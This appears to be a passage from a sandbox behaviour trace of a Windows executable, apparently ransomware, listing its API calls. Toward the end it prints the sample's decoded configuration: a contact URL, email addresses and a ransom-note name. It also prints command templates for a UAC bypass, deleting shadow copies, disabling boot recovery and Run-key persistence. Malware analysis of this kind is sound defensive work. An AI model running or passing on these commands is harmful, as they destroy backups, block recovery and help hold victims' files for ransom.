Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0093.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0093.745] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0093.746] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0093.746] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, 
lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.747] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0093.747] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0093.749] 
GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0093.796] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0093.796] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b 
[0093.797] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0093.797] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0093.802] GetACP () returned 0x4e4 [0093.802] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0093.802] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0093.802] GetTickCount () returned 0x22bef [0093.802] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=15059112538) returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x66\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x46\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x38\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x30\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x53\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x55\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x47\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6b\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x30\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: 
lpWideCharStr="\x43\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x62\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0093.802] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0093.802] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0093.802] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0093.802] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0093.803] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0093.803] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0093.803] LockResource (hResData=0x50d55c) returned 0x50d55c [0093.803] FreeResource (hResData=0x50d55c) returned 0 [0093.803] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.803] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.803] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.803] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.803] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0093.803] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d4f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.803] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d4f60, cbMultiByte=38, lpWideCharStr=0x14cde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.803] FreeResource (hResData=0x50d64c) returned 0 [0093.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14d4f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.803] GetCurrentThreadId () returned 0xae8 [0093.803] GetCurrentThreadId () returned 0xae8 [0093.803] GetCurrentThreadId () returned 0xae8 [0093.803] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x148cd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0093.803] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x148cd18, cbMultiByte=239, lpWideCharStr=0x1492e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0093.803] GetCurrentThreadId () returned 0xae8 [0093.803] GetCurrentThreadId () returned 0xae8 [0093.803] GetCurrentThreadId () returned 0xae8 [0093.803] GetCommandLineW () 
returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.803] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x148399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0093.803] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x148399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0093.803] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0093.805] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0093.806] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0093.807] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0093.807] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0093.808] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0093.809] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0093.809] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0093.810] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14839b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0093.811] ExpandEnvironmentStringsW (in: 
lpSrc="%COMPUTERNAME%", lpDst=0x146c63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0093.811] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x146c63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0093.811] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x146c63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0093.811] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x146c63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0093.811] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0093.811] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0093.812] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0093.812] LockResource (hResData=0x50d72c) returned 0x50d72c [0093.812] FreeResource (hResData=0x50d72c) returned 0 [0093.812] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.812] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.812] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.812] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d5008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d5008, cbMultiByte=38, lpWideCharStr=0x14cdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.812] FreeResource (hResData=0x50d64c) returned 0 [0093.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 
lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14d500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.812] GetCurrentThreadId () returned 0xae8 [0093.812] GetCurrentThreadId () returned 0xae8 [0093.812] GetCurrentThreadId () returned 0xae8 [0093.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x146e688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0093.812] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x146e688, cbMultiByte=1410, lpWideCharStr=0x1489afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && 
\"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0093.813] GetCurrentThreadId () returned 0xae8 [0093.813] GetCurrentThreadId () returned 0xae8 [0093.813] GetCurrentThreadId () returned 0xae8 [0093.813] GetCurrentThread () returned 0xfffffffe [0093.813] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0093.813] GetLastError () returned 0x3f0 [0093.813] GetCurrentProcess () returned 0xffffffff [0093.813] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0093.813] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x1487ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x1487ae0, ReturnLength=0x12fc60) returned 1 [0093.813] CloseHandle (hObject=0xb8) 